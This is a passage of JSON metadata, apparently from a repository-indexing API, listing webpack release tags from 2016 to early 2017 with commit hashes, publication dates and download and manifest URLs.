2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/